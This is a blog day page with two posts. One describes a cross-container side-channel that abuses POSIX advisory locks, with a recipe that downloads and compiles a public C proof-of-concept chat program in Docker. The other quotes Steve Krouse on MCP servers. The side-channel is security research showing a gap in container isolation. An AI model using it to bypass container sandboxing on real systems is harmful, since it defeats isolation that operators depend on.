Simon Willison’s Weblog

Subscribe

Wednesday, 12th November 2025

Fun-reliable side-channels for cross-container communication (via) Here's a very clever hack for communicating between different processes running in different containers on the same machine. It's based on clever abuse of POSIX advisory locks which allow a process to create and detect locks across byte offset ranges:

These properties combined are enough to provide a basic cross-container side-channel primitive, because a process in one container can set a read-lock at some interval on /proc/self/ns/time, and a process in another container can observe the presence of that lock by querying for a hypothetically intersecting write-lock.

I dumped the C proof-of-concept into GPT-5 for a code-level explanation, then had it help me figure out how to run it in Docker. Here's the recipe that worked for me:

cd /tmp
wget https://github.com/crashappsec/h4x0rchat/blob/9b9d0bd5b2287501335acca35d070985e4f51079/h4x0rchat.c
docker run --rm -it -v "$PWD:/src" \
  -w /src gcc:13 bash -lc 'gcc -Wall -O2 \
  -o h4x0rchat h4x0rchat.c && ./h4x0rchat'

Run that docker run line in two separate terminal windows and you can chat between the two of them like this:

Animated demo. Two terminal windows. Both run that command, then start a l33t speak chat interface. Each interface asks the user for a name, then messages that are typed in one are instantly displayed in the other and vice-versa.

# 4:04 pm / c, docker

The fact that MCP is a difference surface from your normal API allows you to ship MUCH faster to MCP. This has been unlocked by inference at runtime

Normal APIs are promises to developers, because developer commit code that relies on those APIs, and then walk away. If you break the API, you break the promise, and you break that code. This means a developer gets woken up at 2am to fix the code

But MCP servers are called by LLMs which dynamically read the spec every time, which allow us to constantly change the MCP server. It doesn't matter! We haven't made any promises. The LLM can figure it out afresh every time

Steve Krouse

# 5:21 pm / apis, ai, generative-ai, llms, steve-krouse, model-context-protocol

2025 » November

MTWTFSS
     12
3456789
10111213141516
17181920212223
24252627282930